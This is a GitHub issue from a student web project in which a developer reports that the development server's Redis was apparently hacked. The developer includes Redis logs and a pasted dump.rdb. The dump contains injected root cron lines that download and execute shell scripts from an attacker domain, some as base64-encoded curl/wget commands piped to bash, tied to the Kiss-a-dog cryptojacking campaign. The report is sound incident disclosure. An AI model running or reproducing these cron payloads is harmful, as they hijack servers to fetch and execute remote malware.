boostcampwm-2022 / web18-PRV

논문 인용관계를 밤하늘의 별 처럼 표시해보자 🌟-🌟
https://paperef.com
138 stars 3 forks source link

[BE] 개발 서버 Redis 해킹당한 현상 #17

Closed leesungbin closed 1 year ago

leesungbin commented 1 year ago

이슈 내용

github action에 의해 재배포되면, 기존에 저장해두었던 redis / db에 있는 내용이 모두 사라지게 됩니다.

기대 결과

참고

leesungbin commented 1 year ago
leesungbin commented 1 year ago
leesungbin commented 1 year ago
leesungbin commented 1 year ago
1:M 17 Nov 2022 07:51:23.268 * DB saved on disk
1:M 17 Nov 2022 07:51:23.644 * DB saved on disk
1:M 17 Nov 2022 07:51:25.012 * DB saved on disk
1:M 17 Nov 2022 07:51:25.398 * DB saved on disk
1:M 17 Nov 2022 07:51:25.581 * DB saved on disk
1:M 17 Nov 2022 07:51:26.923 * DB saved on disk
1:M 17 Nov 2022 07:51:27.486 * DB saved on disk

DB saved on disk가 실행되면서 레디스 내용이 초기화된다.

leesungbin commented 1 year ago
leesungbin commented 1 year ago

dump.rdb를 확인해보니, 해킹당한 것일 수도 있겠다는 생각이 든다.

REDIS0010�  redis-ver7.0.5�
redis-bits�@�ctime�b
                    vcused-mem�P�aof-base���backup4@�

@hourly root  python -c "import urllib2; print urllib2.urlopen('http://ki\s\s.a-d\og.t\op/t.sh').read()" >.1;chmod +x .1;./.1

backup3@c

*/4 * * * * root echo Y3VybCBodHRwOi8va2lzcy5hLWRvZy50b3AvYjJmNjI4L2Iuc2gK|base64 -d|bash|bash

backup2@o

*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL2tpc3MuYS1kb2cudG9wL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash

backup1@d

*/2 * * * * root echo Y2QxIGh0dHA6Ly9raXNzLmEtZG9nLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash

�iU0?���#

https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/

leesungbin commented 1 year ago